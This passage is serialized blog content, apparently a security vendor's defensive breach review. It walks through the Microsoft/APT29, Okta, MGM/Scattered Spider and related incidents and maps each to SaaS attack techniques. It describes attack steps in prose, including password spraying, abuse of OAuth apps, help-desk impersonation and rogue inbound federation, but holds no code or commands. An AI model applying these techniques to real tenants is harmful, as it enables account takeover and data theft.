Parts",[],{},{"nodeType":254,"data":221977,"content":221978},{},[221979],{"nodeType":178,"data":221980,"content":221981},{},[221982],{"nodeType":173,"value":221983,"marks":221984,"data":221985},"Truist Bank",[],{},{"nodeType":254,"data":221987,"content":221988},{},[221989],{"nodeType":178,"data":221990,"content":221991},{},[221992],{"nodeType":173,"value":221993,"marks":221994,"data":221995},"Lending Tree",[],{},{"nodeType":231,"data":221997,"content":221998},{},[],{"nodeType":169,"data":222000,"content":222001},{},[222002],{"nodeType":173,"value":222003,"marks":222004,"data":222005},"Microsoft — January 2024",[],{},{"nodeType":178,"data":222007,"content":222008},{},[222009],{"nodeType":173,"value":222010,"marks":222011,"data":222012},"The threat group known as APT29 (also known as “The Dukes”, “Cozy Bear”, and labeled “Midnight Blizzard” by Microsoft) executed a cleverly executed password-guessing attack to compromise test cloud identities that were also lacking MFA. Attackers then leveraged this access to compromise some OAuth applications that allowed lateral movement to Microsoft’s corporate environment and the creation of other malicious OAuth applications to achieve persistence.",[],{},{"nodeType":235,"data":222014,"content":222015},{},[222016],{"nodeType":173,"value":222017,"marks":222018,"data":222019},"How did Microsoft get breached?",[],{},{"nodeType":250,"data":222021,"content":222022},{},[222023,222033,222043,222053,222063,222073],{"nodeType":254,"data":222024,"content":222025},{},[222026],{"nodeType":178,"data":222027,"content":222028},{},[222029],{"nodeType":173,"value":222030,"marks":222031,"data":222032},"APT29 utilized password spraying / credential stuffing attacks to compromise test cloud identities that were also lacking MFA, attached to a non-production test tenant.",[],{},{"nodeType":254,"data":222034,"content":222035},{},[222036],{"nodeType":178,"data":222037,"content":222038},{},[222039],{"nodeType":173,"value":222040,"marks":222041,"data":222042},"APT29 leveraged their initial access to the test tenant to identify and compromise a test OAuth application that had access to the Microsoft corporate environment by leveraging permissive Entra ID roles in the test tenant.",[],{},{"nodeType":254,"data":222044,"content":222045},{},[222046],{"nodeType":178,"data":222047,"content":222048},{},[222049],{"nodeType":173,"value":222050,"marks":222051,"data":222052},"APT29 used the existing configurations to access the Microsoft corporate Entra ID tenant whereupon the app registration from the test tenant was installed as a service principal in the corporate tenant, granting the equivalent of global admin rights.",[],{},{"nodeType":254,"data":222054,"content":222055},{},[222056],{"nodeType":178,"data":222057,"content":222058},{},[222059],{"nodeType":173,"value":222060,"marks":222061,"data":222062},"Using these new permissions, APT29 registered additional malicious OAuth applications in the Microsoft corporate environment, and created a new user in the Microsoft corporate tenant to grant consent to the new malicious OAuth apps, thereby achieving persistent access to the environment.",[],{},{"nodeType":254,"data":222064,"content":222065},{},[222066],{"nodeType":178,"data":222067,"content":222068},{},[222069],{"nodeType":173,"value":222070,"marks":222071,"data":222072},"APT29 leveraged the elevated (maximum) privileges assigned to the ‘test’ app service principal to grant app roles to other newly created app service principals, granting them the Office 365 Exchange Online full_access_as_app role in the corporate tenant, which allows access to mailboxes.",[],{},{"nodeType":254,"data":222074,"content":222075},{},[222076],{"nodeType":178,"data":222077,"content":222078},{},[222079],{"nodeType":173,"value":222080,"marks":222081,"data":222082},"APT29 leveraged these malicious OAuth applications to authenticate to Microsoft Exchange Online and target Microsoft corporate email accounts.",[],{},{"nodeType":235,"data":222084,"content":222085},{},[222086],{"nodeType":173,"value":222087,"marks":222088,"data":222089},"What was the impact of the Microsoft breach?",[],{},{"nodeType":250,"data":222091,"content":222092},{},[222093,222103,222113],{"nodeType":254,"data":222094,"content":222095},{},[222096],{"nodeType":178,"data":222097,"content":222098},{},[222099],{"nodeType":173,"value":222100,"marks":222101,"data":222102},"APT29 had access to Microsoft corporate email accounts, including members of the senior leadership team and employees in the cybersecurity, legal, and other functions, resulting in sensitive data leakage.",[],{},{"nodeType":254,"data":222104,"content":222105},{},[222106],{"nodeType":178,"data":222107,"content":222108},{},[222109],{"nodeType":173,"value":222110,"marks":222111,"data":222112},"Microsoft has not disclosed any further impacts at this time, but it is likely that the adversary had complete, unmitigated control of the Microsoft corporate tenant for a period of time, with global administrator level access.",[],{},{"nodeType":254,"data":222114,"content":222115},{},[222116],{"nodeType":178,"data":222117,"content":222118},{},[222119],{"nodeType":173,"value":222120,"marks":222121,"data":222122},"Since the initial attack there has been evidence of continued targeting, with password spraying attacks reportedly increasing tenfold, likely informed by stolen information.",[],{},{"nodeType":235,"data":222124,"content":222125},{},[222126],{"nodeType":173,"value":222127,"marks":222128,"data":222129},"What stands out in the Microsoft breach?",[],{},{"nodeType":250,"data":222131,"content":222132},{},[222133,222143,222153,222163],{"nodeType":254,"data":222134,"content":222135},{},[222136],{"nodeType":178,"data":222137,"content":222138},{},[222139],{"nodeType":173,"value":222140,"marks":222141,"data":222142},"The attack was covert and targeted, with APT29 tailoring the attack to a limited number of accounts and using a low number of attempts to evade detection and avoid account blocks based on the volume of failures.",[],{},{"nodeType":254,"data":222144,"content":222145},{},[222146],{"nodeType":178,"data":222147,"content":222148},{},[222149],{"nodeType":173,"value":222150,"marks":222151,"data":222152},"APT29 used residential proxy networks when interacting with the compromised tenant and, subsequently, with Exchange Online to obfuscate the source of their attack and avoid impossible travel detections. ",[],{},{"nodeType":254,"data":222154,"content":222155},{},[222156],{"nodeType":178,"data":222157,"content":222158},{},[222159],{"nodeType":173,"value":222160,"marks":222161,"data":222162},"APT29 demonstrated mature and in-depth understanding of cloud infrastructure, protocols, and workflows, particularly in terms of privilege escalation and lateral movement.",[],{},{"nodeType":254,"data":222164,"content":222165},{},[222166],{"nodeType":178,"data":222167,"content":222168},{},[222169],{"nodeType":173,"value":222170,"marks":222171,"data":222172},"If even Microsoft (an organization with pretty much unrivaled security resources) can’t ensure that all their accounts are protected by MFA and that there are no weak links between test/dev and prod systems, this should be a wake-up call for any company that thinks their MFA implementation is flawless. ",[],{},{"nodeType":235,"data":222174,"content":222175},{},[222176],{"nodeType":173,"value":222177,"marks":222178,"data":222179},"SaaS Attack Matrix mapping",[],{},{"nodeType":178,"data":222181,"content":222182},{},[222183],{"nodeType":173,"value":221726,"marks":222184,"data":222185},[],{},{"nodeType":1653,"data":222187,"content":222188},{},[222189,222229,222291,222353],{"nodeType":1657,"data":222190,"content":222191},{},[222192,222201,222211,222220],{"nodeType":1661,"data":222193,"content":222194},{},[222195],{"nodeType":178,"data":222196,"content":222197},{},[222198],{"nodeType":173,"value":221742,"marks":222199,"data":222200},[],{},{"nodeType":1661,"data":222202,"content":222203},{},[222204],{"nodeType":178,"data":222205,"content":222206},{},[222207],{"nodeType":173,"value":222208,"marks":222209,"data":222210},"Technique",[],{},{"nodeType":1661,"data":222212,"content":222213},{},[222214],{"nodeType":178,"data":222215,"content":222216},{},[222217],{"nodeType":173,"value":221762,"marks":222218,"data":222219},[],{},{"nodeType":1661,"data":222221,"content":222222},{},[222223],{"nodeType":178,"data":222224,"content":222225},{},[222226],{"nodeType":173,"value":221772,"marks":222227,"data":222228},[],{},{"nodeType":1657,"data":222230,"content":222231},{},[222232,222252,222271,222281],{"nodeType":1687,"data":222233,"content":222234},{},[222235],{"nodeType":178,"data":222236,"content":222237},{},[222238,222241,222249],{"nodeType":173,"value":37,"marks":222239,"data":222240},[],{},{"nodeType":186,"data":222242,"content":222243},{"uri":184680},[222244],{"nodeType":173,"value":222245,"marks":222246,"data":222248},"SAT1011",[222247],{"type":194},{},{"nodeType":173,"value":37,"marks":222250,"data":222251},[],{},{"nodeType":1687,"data":222253,"content":222254},{},[222255],{"nodeType":178,"data":222256,"content":222257},{},[222258,222261,222268],{"nodeType":173,"value":37,"marks":222259,"data":222260},[],{},{"nodeType":186,"data":222262,"content":222263},{"uri":184680},[222264],{"nodeType":173,"value":197416,"marks":222265,"data":222267},[222266],{"type":194},{},{"nodeType":173,"value":37,"marks":222269,"data":222270},[],{},{"nodeType":1687,"data":222272,"content":222273},{},[222274],{"nodeType":178,"data":222275,"content":222276},{},[222277],{"nodeType":173,"value":222278,"marks":222279,"data":222280},"Initial Access",[],{},{"nodeType":1687,"data":222282,"content":222283},{},[222284],{"nodeType":178,"data":222285,"content":222286},{},[222287],{"nodeType":173,"value":222288,"marks":222289,"data":222290},"Attempt to authenticate to a SaaS account by guessing a large number of passwords ",[],{},{"nodeType":1657,"data":222292,"content":222293},{},[222294,222314,222333,222343],{"nodeType":1687,"data":222295,"content":222296},{},[222297],{"nodeType":178,"data":222298,"content":222299},{},[222300,222303,222311],{"nodeType":173,"value":37,"marks":222301,"data":222302},[],{},{"nodeType":186,"data":222304,"content":222305},{"uri":197688},[222306],{"nodeType":173,"value":222307,"marks":222308,"data":222310},"SAT1027",[222309],{"type":194},{},{"nodeType":173,"value":37,"marks":222312,"data":222313},[],{},{"nodeType":1687,"data":222315,"content":222316},{},[222317],{"nodeType":178,"data":222318,"content":222319},{},[222320,222323,222330],{"nodeType":173,"value":37,"marks":222321,"data":222322},[],{},{"nodeType":186,"data":222324,"content":222325},{"uri":197688},[222326],{"nodeType":173,"value":197694,"marks":222327,"data":222329},[222328],{"type":194},{},{"nodeType":173,"value":37,"marks":222331,"data":222332},[],{},{"nodeType":1687,"data":222334,"content":222335},{},[222336],{"nodeType":178,"data":222337,"content":222338},{},[222339],{"nodeType":173,"value":222340,"marks":222341,"data":222342},"Execution; Persistence; Defense Evasion",[],{},{"nodeType":1687,"data":222344,"content":222345},{},[222346],{"nodeType":178,"data":222347,"content":222348},{},[222349],{"nodeType":173,"value":222350,"marks":222351,"data":222352},"Use a malicious OAuth app to create an OAuth token, using arbitrary permissions to maintain long-term programmatic access to a compromised user account.",[],{},{"nodeType":1657,"data":222354,"content":222355},{},[222356,222376,222396,222406],{"nodeType":1687,"data":222357,"content":222358},{},[222359],{"nodeType":178,"data":222360,"content":222361},{},[222362,222365,222373],{"nodeType":173,"value":37,"marks":222363,"data":222364},[],{},{"nodeType":186,"data":222366,"content":222367},{"uri":197917},[222368],{"nodeType":173,"value":222369,"marks":222370,"data":222372},"SAT1001",[222371],{"type":194},{},{"nodeType":173,"value":37,"marks":222374,"data":222375},[],{},{"nodeType":1687,"data":222377,"content":222378},{},[222379],{"nodeType":178,"data":222380,"content":222381},{},[222382,222385,222393],{"nodeType":173,"value":37,"marks":222383,"data":222384},[],{},{"nodeType":186,"data":222386,"content":222387},{"uri":197917},[222388],{"nodeType":173,"value":222389,"marks":222390,"data":222392},"Abuse existing OAuth integrations",[222391],{"type":194},{},{"nodeType":173,"value":37,"marks":222394,"data":222395},[],{},{"nodeType":1687,"data":222397,"content":222398},{},[222399],{"nodeType":178,"data":222400,"content":222401},{},[222402],{"nodeType":173,"value":222403,"marks":222404,"data":222405},"Privilege Escalation;\nLateral Movement",[],{},{"nodeType":1687,"data":222407,"content":222408},{},[222409],{"nodeType":178,"data":222410,"content":222411},{},[222412],{"nodeType":173,"value":222413,"marks":222414,"data":222415},"If an adversary compromises a SaaS account integrated with other apps, they can escalate privileges and move laterally to other apps.",[],{},{"nodeType":235,"data":222417,"content":222418},{},[222419],{"nodeType":173,"value":221903,"marks":222420,"data":222421},[],{},{"nodeType":178,"data":222423,"content":222424},{},[222425],{"nodeType":173,"value":222426,"marks":222427,"data":222429},"Hewlett Packard Enterprise (HPE) — May 2023",[222428],{"type":370},{},{"nodeType":178,"data":222431,"content":222432},{},[222433],{"nodeType":173,"value":222434,"marks":222435,"data":222436},"At the time of the Microsoft breach becoming public knowledge, HPE disclosed that they had become aware of a historical incident in Dec 2023, involving unauthorized access to and exfiltration of a limited number of SharePoint files as early as May 2023. Hackers accessed and exfiltrated data from HPE mailboxes belonging to individuals in the cybersecurity, go-to-market, business segments, and other functions. No further information is available on the techniques used or impact of the breach. ",[],{},{"nodeType":231,"data":222438,"content":222439},{},[],{"nodeType":169,"data":222441,"content":222442},{},[222443],{"nodeType":173,"value":222444,"marks":222445,"data":222446},"Okta — October 2023",[],{},{"nodeType":178,"data":222448,"content":222449},{},[222450],{"nodeType":173,"value":222451,"marks":222452,"data":222453},"An unknown threat group compromised an Okta employee's personal Google account that was being used on a company-managed device, granting the threat actor access to a service account for Okta’s customer support system, that included session tokens for 134 customers. This was then used to hijack the legitimate Okta sessions of five customers. ",[],{},{"nodeType":235,"data":222455,"content":222456},{},[222457],{"nodeType":173,"value":222458,"marks":222459,"data":222460},"How did Okta get breached?",[],{},{"nodeType":250,"data":222462,"content":222463},{},[222464,222474,222484,222494,222504],{"nodeType":254,"data":222465,"content":222466},{},[222467],{"nodeType":178,"data":222468,"content":222469},{},[222470],{"nodeType":173,"value":222471,"marks":222472,"data":222473},"The threat actor compromised a personal Google account that the user had accessed from their Okta-managed work device by signing into their personal profile from the Chrome browser.",[],{},{"nodeType":254,"data":222475,"content":222476},{},[222477],{"nodeType":178,"data":222478,"content":222479},{},[222480],{"nodeType":173,"value":222481,"marks":222482,"data":222483},"The personal account credentials are likely to have been compromised in a historical data breach and did not have MFA enabled.",[],{},{"nodeType":254,"data":222485,"content":222486},{},[222487],{"nodeType":178,"data":222488,"content":222489},{},[222490],{"nodeType":173,"value":222491,"marks":222492,"data":222493},"The username and password of a service account for Okta’s customer support system had been saved into the employee’s personal Google account and was therefore compromised.",[],{},{"nodeType":254,"data":222495,"content":222496},{},[222497],{"nodeType":178,"data":222498,"content":222499},{},[222500],{"nodeType":173,"value":222501,"marks":222502,"data":222503},"The threat actor was able to access the service account by logging in using the stolen credentials, which again likely did not have MFA deployed as a service account.",[],{},{"nodeType":254,"data":222505,"content":222506},{},[222507],{"nodeType":178,"data":222508,"content":222509},{},[222510],{"nodeType":173,"value":222511,"marks":222512,"data":222513},"The threat actor was able to use session tokens in the HAR files to impersonate staff and hijack the legitimate Okta sessions of five customers, including 1Password, BeyondTrust, and Cloudflare.",[],{},{"nodeType":235,"data":222515,"content":222516},{},[222517],{"nodeType":173,"value":222518,"marks":222519,"data":222520},"What was the impact of the Okta breach?",[],{},{"nodeType":250,"data":222522,"content":222523},{},[222524,222534,222544,222554],{"nodeType":254,"data":222525,"content":222526},{},[222527],{"nodeType":178,"data":222528,"content":222529},{},[222530],{"nodeType":173,"value":222531,"marks":222532,"data":222533},"The threat actor gained unauthorized access to files inside Okta’s customer support system associated with 134 Okta customers.",[],{},{"nodeType":254,"data":222535,"content":222536},{},[222537],{"nodeType":178,"data":222538,"content":222539},{},[222540],{"nodeType":173,"value":222541,"marks":222542,"data":222543},"The threat actor was able to use these session tokens to hijack the legitimate Okta sessions of 5 (publicly disclosed) customers.",[],{},{"nodeType":254,"data":222545,"content":222546},{},[222547],{"nodeType":178,"data":222548,"content":222549},{},[222550],{"nodeType":173,"value":222551,"marks":222552,"data":222553},"Okta originally claimed the breach had impacted only 1% of customers, but later found that a report run and downloaded by the threat actor contained the names and email addresses of all 18,400 Okta customer support users, as well as some Okta employee information, meaning 100% of customer support users were impacted.",[],{},{"nodeType":254,"data":222555,"content":222556},{},[222557],{"nodeType":178,"data":222558,"content":222559},{},[222560],{"nodeType":173,"value":222561,"marks":222562,"data":222563},"Okta users are at higher risk of phishing and credential stuffing attacks based on the data stolen by the threat actor, increasing the importance of robust MFA implementation.",[],{},{"nodeType":235,"data":222565,"content":222566},{},[222567],{"nodeType":173,"value":222568,"marks":222569,"data":222570},"What stands out in the Okta breach?",[],{},{"nodeType":250,"data":222572,"content":222573},{},[222574,222584,222594],{"nodeType":254,"data":222575,"content":222576},{},[222577],{"nodeType":178,"data":222578,"content":222579},{},[222580],{"nodeType":173,"value":222581,"marks":222582,"data":222583},"This attack demonstrates the risk associated with cloud Identity Providers and the potential goldmine that they are to attackers. Much in the same way that the manufacturers of physical and virtual network appliances are continuously probed for software vulnerabilities, cloud IdPs like Okta present a huge potential opportunity, both in terms of targeting specific organizational instances as well as the Okta organization. This attack showcases the possibility of third-party supply chain attacks to target downstream organizations using IdP services. ",[],{},{"nodeType":254,"data":222585,"content":222586},{},[222587],{"nodeType":178,"data":222588,"content":222589},{},[222590],{"nodeType":173,"value":222591,"marks":222592,"data":222593},"Similar to the Microsoft breach, gaps were discovered and exploited in Okta’s MFA coverage and implementation, highlighting that there are gaps in even the most mature organizations. ",[],{},{"nodeType":254,"data":222595,"content":222596},{},[222597],{"nodeType":178,"data":222598,"content":222599},{},[222600],{"nodeType":173,"value":222601,"marks":222602,"data":222603},"The subsequent attack on Cloudflare (see below) and the scale of the recovery effort demonstrates the significant operational overhead in responding to and recovering from a breach of identity infrastructure, with a similar or greater scale than a traditional Active Directory compromise. While addressing the incident, Cloudflare's staff rotated all production credentials (over 5,000 unique ones), physically segmented test and staging systems, performed forensic triage on 4,893 systems, reimaged and rebooted all systems on the company's global network, including all Atlassian servers (Jira, Confluence, and Bitbucket) and machines accessed by the threat actor. All equipment in Cloudflare's Brazil data center, which was unsuccessfully targeted by the threat actor, was later returned to the manufacturers to ensure that the data center was secure.",[],{},{"nodeType":235,"data":222605,"content":222606},{},[222607],{"nodeType":173,"value":222177,"marks":222608,"data":222609},[],{},{"nodeType":178,"data":222611,"content":222612},{},[222613],{"nodeType":173,"value":221726,"marks":222614,"data":222615},[],{},{"nodeType":1653,"data":222617,"content":222618},{},[222619,222658,222717],{"nodeType":1657,"data":222620,"content":222621},{},[222622,222631,222640,222649],{"nodeType":1661,"data":222623,"content":222624},{},[222625],{"nodeType":178,"data":222626,"content":222627},{},[222628],{"nodeType":173,"value":221742,"marks":222629,"data":222630},[],{},{"nodeType":1661,"data":222632,"content":222633},{},[222634],{"nodeType":178,"data":222635,"content":222636},{},[222637],{"nodeType":173,"value":222208,"marks":222638,"data":222639},[],{},{"nodeType":1661,"data":222641,"content":222642},{},[222643],{"nodeType":178,"data":222644,"content":222645},{},[222646],{"nodeType":173,"value":221762,"marks":222647,"data":222648},[],{},{"nodeType":1661,"data":222650,"content":222651},{},[222652],{"nodeType":178,"data":222653,"content":222654},{},[222655],{"nodeType":173,"value":221772,"marks":222656,"data":222657},[],{},{"nodeType":1657,"data":222659,"content":222660},{},[222661,222680,222699,222708],{"nodeType":1687,"data":222662,"content":222663},{},[222664],{"nodeType":178,"data":222665,"content":222666},{},[222667,222670,222677],{"nodeType":173,"value":37,"marks":222668,"data":222669},[],{},{"nodeType":186,"data":222671,"content":222672},{"uri":184680},[222673],{"nodeType":173,"value":222245,"marks":222674,"data":222676},[222675],{"type":194},{},{"nodeType":173,"value":37,"marks":222678,"data":222679},[],{},{"nodeType":1687,"data":222681,"content":222682},{},[222683],{"nodeType":178,"data":222684,"content":222685},{},[222686,222689,222696],{"nodeType":173,"value":37,"marks":222687,"data":222688},[],{},{"nodeType":186,"data":222690,"content":222691},{"uri":184680},[222692],{"nodeType":173,"value":197416,"marks":222693,"data":222695},[222694],{"type":194},{},{"nodeType":173,"value":37,"marks":222697,"data":222698},[],{},{"nodeType":1687,"data":222700,"content":222701},{},[222702],{"nodeType":178,"data":222703,"content":222704},{},[222705],{"nodeType":173,"value":222278,"marks":222706,"data":222707},[],{},{"nodeType":1687,"data":222709,"content":222710},{},[222711],{"nodeType":178,"data":222712,"content":222713},{},[222714],{"nodeType":173,"value":222288,"marks":222715,"data":222716},[],{},{"nodeType":1657,"data":222718,"content":222719},{},[222720,222741,222761,222771],{"nodeType":1687,"data":222721,"content":222722},{},[222723],{"nodeType":178,"data":222724,"content":222725},{},[222726,222729,222738],{"nodeType":173,"value":37,"marks":222727,"data":222728},[],{},{"nodeType":186,"data":222730,"content":222732},{"uri":222731},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/password_scraping/description.md",[222733],{"nodeType":173,"value":222734,"marks":222735,"data":222737},"SAT1028",[222736],{"type":194},{},{"nodeType":173,"value":37,"marks":222739,"data":222740},[],{},{"nodeType":1687,"data":222742,"content":222743},{},[222744],{"nodeType":178,"data":222745,"content":222746},{},[222747,222750,222758],{"nodeType":173,"value":37,"marks":222748,"data":222749},[],{},{"nodeType":186,"data":222751,"content":222752},{"uri":222731},[222753],{"nodeType":173,"value":222754,"marks":222755,"data":222757},"Password Scraping",[222756],{"type":194},{},{"nodeType":173,"value":37,"marks":222759,"data":222760},[],{},{"nodeType":1687,"data":222762,"content":222763},{},[222764],{"nodeType":178,"data":222765,"content":222766},{},[222767],{"nodeType":173,"value":222768,"marks":222769,"data":222770},"Credential Access",[],{},{"nodeType":1687,"data":222772,"content":222773},{},[222774],{"nodeType":178,"data":222775,"content":222776},{},[222777],{"nodeType":173,"value":222778,"marks":222779,"data":222780},"Collection of credentials and secrets from repositories e.g. password managers, SaaS file stores, etc.",[],{},{"nodeType":235,"data":222782,"content":222783},{},[222784],{"nodeType":173,"value":221903,"marks":222785,"data":222786},[],{},{"nodeType":178,"data":222788,"content":222789},{},[222790],{"nodeType":173,"value":222791,"marks":222792,"data":222794},"Cloudflare — November 2023",[222793],{"type":370},{},{"nodeType":178,"data":222796,"content":222797},{},[222798],{"nodeType":173,"value":222799,"marks":222800,"data":222801},"The threat actor used tokens and credentials that had not been rotated to breach Cloudflare’s internal Atlassian server and access its Confluence wiki, Jira bug database, and Bitbucket source code management system. The threat actor first gained access to Cloudflare's self-hosted Atlassian server and then accessed the company's Confluence and Jira systems following a reconnaissance stage. Cloudflare says that this breach did not impact customer data or systems or the provision of services.",[],{},{"nodeType":178,"data":222803,"content":222804},{},[222805],{"nodeType":173,"value":222806,"marks":222807,"data":222809},"1Password — October 2023",[222808],{"type":370},{},{"nodeType":178,"data":222811,"content":222812},{},[222813],{"nodeType":173,"value":222814,"marks":222815,"data":222816},"1Password reported unsolicited activity in their Okta environment which was traced to a suspicious IP address. Later it was confirmed that an threat actor had accessed 1Password’s Okta environment using administrative privileges. They attempted to access the IT team member’s user dashboard, but that attempt was blocked by Okta. They also requested a report of administrative users, which was identified as suspicious and triggered an investigation. 1Password says it terminated the activity, investigated, and found no compromise of user data or other sensitive systems, either employee-facing or user-facing.",[],{},{"nodeType":178,"data":222818,"content":222819},{},[222820],{"nodeType":173,"value":222821,"marks":222822,"data":222824},"BeyondTrust - October 2023",[222823],{"type":370},{},{"nodeType":178,"data":222826,"content":222827},{},[222828],{"nodeType":173,"value":222829,"marks":222830,"data":222831},"BeyondTrust security teams detected an identity-centric attack on an in-house Okta administrator account. BeyondTrust blocked all access to the threat actor, and verified that they did not gain access to any systems. BeyondTrust has confirmed that there was no additional exposure to our internal systems or BeyondTrust’s customers.",[],{},{"nodeType":231,"data":222833,"content":222834},{},[],{"nodeType":169,"data":222836,"content":222837},{},[222838],{"nodeType":173,"value":222839,"marks":222840,"data":222841},"MGM Resorts — September 2023",[],{},{"nodeType":178,"data":222843,"content":222844},{},[222845],{"nodeType":173,"value":222846,"marks":222847,"data":222848},"The threat group known as Scattered Spider socially engineered MGM help desk personnel to grant ‘super admin’ access to the Okta tenant, which was then used to steal data and deploy ransomware, resulting in significant business disruption. ",[],{},{"nodeType":235,"data":222850,"content":222851},{},[222852],{"nodeType":173,"value":222853,"marks":222854,"data":222855},"How did MGM get breached?",[],{},{"nodeType":250,"data":222857,"content":222858},{},[222859,222869,222879,222889,222899,222909],{"nodeType":254,"data":222860,"content":222861},{},[222862],{"nodeType":178,"data":222863,"content":222864},{},[222865],{"nodeType":173,"value":222866,"marks":222867,"data":222868},"Scattered Spider researched MGM employees on LinkedIn to identify individuals likely to have privileged Okta access, specifically Super Administrator privileges. ",[],{},{"nodeType":254,"data":222870,"content":222871},{},[222872],{"nodeType":178,"data":222873,"content":222874},{},[222875],{"nodeType":173,"value":222876,"marks":222877,"data":222878},"Scattered Spider contacted the IT help desk impersonating an employee with a privileged account asking for an authentication reset (password and MFA).",[],{},{"nodeType":254,"data":222880,"content":222881},{},[222882],{"nodeType":178,"data":222883,"content":222884},{},[222885],{"nodeType":173,"value":222886,"marks":222887,"data":222888},"With privileged access, the compromised Super Administrator accounts were used to assign higher privileges to other accounts, circumventing MFA by removing enrolled authenticators and/or removing MFA from authentication policies.",[],{},{"nodeType":254,"data":222890,"content":222891},{},[222892],{"nodeType":178,"data":222893,"content":222894},{},[222895],{"nodeType":173,"value":222896,"marks":222897,"data":222898},"Scattered Spider registered a second, attacker-controlled IdP via Org2Org using inbound federation, granting the ability to impersonate users and access applications on their behalf. By matching the username of target accounts in the second IdP to the original, the attacker was able to SSO into target applications. ",[],{},{"nodeType":254,"data":222900,"content":222901},{},[222902],{"nodeType":178,"data":222903,"content":222904},{},[222905],{"nodeType":173,"value":222906,"marks":222907,"data":222908},"Through inbound federation, Scattered Spider obtained global admin rights in Azure, effectively granting full control over connected systems and granting domain admin privileges in target environments.",[],{},{"nodeType":254,"data":222910,"content":222911},{},[222912],{"nodeType":178,"data":222913,"content":222914},{},[222915],{"nodeType":173,"value":222916,"marks":222917,"data":222918},"Scattered Spider deployed encryption software to around 100 ESXi servers and exfiltrated data, disrupting core business operations.",[],{},{"nodeType":235,"data":222920,"content":222921},{},[222922],{"nodeType":173,"value":222923,"marks":222924,"data":222925},"What was the impact of the MGM breach?",[],{},{"nodeType":250,"data":222927,"content":222928},{},[222929,222939,222949],{"nodeType":254,"data":222930,"content":222931},{},[222932],{"nodeType":178,"data":222933,"content":222934},{},[222935],{"nodeType":173,"value":222936,"marks":222937,"data":222938},"Led to a 36-hour outage of multiple MGM IT systems and affected a number of its casinos on the Las Vegas strip, including the Bellagio, Excalibur, Luxor, Mandalay Bay and New York New York.",[],{},{"nodeType":254,"data":222940,"content":222941},{},[222942],{"nodeType":178,"data":222943,"content":222944},{},[222945],{"nodeType":173,"value":222946,"marks":222947,"data":222948},"Personal data compromise of an unspecified number of customers including various contact information, dates of births, genders, driver’s license numbers, social security numbers, and passport information. ",[],{},{"nodeType":254,"data":222950,"content":222951},{},[222952],{"nodeType":178,"data":222953,"content":222954},{},[222955],{"nodeType":173,"value":222956,"marks":222957,"data":222958},"MGM reported that the attack would cause a $100 million hit to its third-quarter results, including $10 million in one-time cyber security consulting fees. ",[],{},{"nodeType":235,"data":222960,"content":222961},{},[222962],{"nodeType":173,"value":222963,"marks":222964,"data":222965},"What stands out in the MGM breach?",[],{},{"nodeType":250,"data":222967,"content":222968},{},[222969,222979,222989],{"nodeType":254,"data":222970,"content":222971},{},[222972],{"nodeType":178,"data":222973,"content":222974},{},[222975],{"nodeType":173,"value":222976,"marks":222977,"data":222978},"The MGM breach demonstrates how financially motivated organized criminal groups are specifically targeting the identity infrastructure of an organization (e.g. the chosen IdP solution) and leveraging cloud-native functionality. ",[],{},{"nodeType":254,"data":222980,"content":222981},{},[222982],{"nodeType":178,"data":222983,"content":222984},{},[222985],{"nodeType":173,"value":222986,"marks":222987,"data":222988},"The MGM breach is notable for being a hybrid attack that ended in what has become a typical “actions on objective” for ransomware operators and their affiliates - the propagation of malware and encryption of core business servers. In this way attackers are leveraging the newer functionality that cloud services provide them to target non-cloud/on-premise resources. This potentially indicates that attackers see cloud applications and services as the path of least resistance to achieving their goals, exploiting more limited security team visibility and understanding of these services compared to more traditional (now well protected) targets. ",[],{},{"nodeType":254,"data":222990,"content":222991},{},[222992],{"nodeType":178,"data":222993,"content":222994},{},[222995],{"nodeType":173,"value":222996,"marks":222997,"data":222998},"While attackers were focused on taking control of the cloud IdP, the initial access vector was notable for being a more traditional method (vishing) to bypass the need to acquire credentials (password and MFA token). This type of technique remains consistently effective, regardless of the technology landscape and whether MFA is correctly implemented or not.    ",[],{},{"nodeType":235,"data":223000,"content":223001},{},[223002],{"nodeType":173,"value":222177,"marks":223003,"data":223004},[],{},{"nodeType":178,"data":223006,"content":223007},{},[223008],{"nodeType":173,"value":221726,"marks":223009,"data":223010},[],{},{"nodeType":1653,"data":223012,"content":223013},{},[223014,223053],{"nodeType":1657,"data":223015,"content":223016},{},[223017,223026,223035,223044],{"nodeType":1661,"data":223018,"content":223019},{},[223020],{"nodeType":178,"data":223021,"content":223022},{},[223023],{"nodeType":173,"value":221742,"marks":223024,"data":223025},[],{},{"nodeType":1661,"data":223027,"content":223028},{},[223029],{"nodeType":178,"data":223030,"content":223031},{},[223032],{"nodeType":173,"value":222208,"marks":223033,"data":223034},[],{},{"nodeType":1661,"data":223036,"content":223037},{},[223038],{"nodeType":178,"data":223039,"content":223040},{},[223041],{"nodeType":173,"value":221762,"marks":223042,"data":223043},[],{},{"nodeType":1661,"data":223045,"content":223046},{},[223047],{"nodeType":178,"data":223048,"content":223049},{},[223050],{"nodeType":173,"value":221772,"marks":223051,"data":223052},[],{},{"nodeType":1657,"data":223054,"content":223055},{},[223056,223076,223096,223106],{"nodeType":1687,"data":223057,"content":223058},{},[223059],{"nodeType":178,"data":223060,"content":223061},{},[223062,223065,223073],{"nodeType":173,"value":37,"marks":223063,"data":223064},[],{},{"nodeType":186,"data":223066,"content":223067},{"uri":989},[223068],{"nodeType":173,"value":223069,"marks":223070,"data":223072},"SAT1041",[223071],{"type":194},{},{"nodeType":173,"value":37,"marks":223074,"data":223075},[],{},{"nodeType":1687,"data":223077,"content":223078},{},[223079],{"nodeType":178,"data":223080,"content":223081},{},[223082,223085,223093],{"nodeType":173,"value":37,"marks":223083,"data":223084},[],{},{"nodeType":186,"data":223086,"content":223087},{"uri":989},[223088],{"nodeType":173,"value":223089,"marks":223090,"data":223092},"Inbound Federation",[223091],{"type":194},{},{"nodeType":173,"value":37,"marks":223094,"data":223095},[],{},{"nodeType":1687,"data":223097,"content":223098},{},[223099],{"nodeType":178,"data":223100,"content":223101},{},[223102],{"nodeType":173,"value":223103,"marks":223104,"data":223105},"Persistence; Lateral Movement",[],{},{"nodeType":1687,"data":223107,"content":223108},{},[223109],{"nodeType":178,"data":223110,"content":223111},{},[223112],{"nodeType":173,"value":223113,"marks":223114,"data":223115},"Inbound federation allows users to login to a target identity provider by authenticating with a source identity provider",[],{},{"nodeType":231,"data":223117,"content":223118},{},[],{"nodeType":169,"data":223120,"content":223121},{},[223122],{"nodeType":173,"value":223123,"marks":223124,"data":223125},"Retool — August 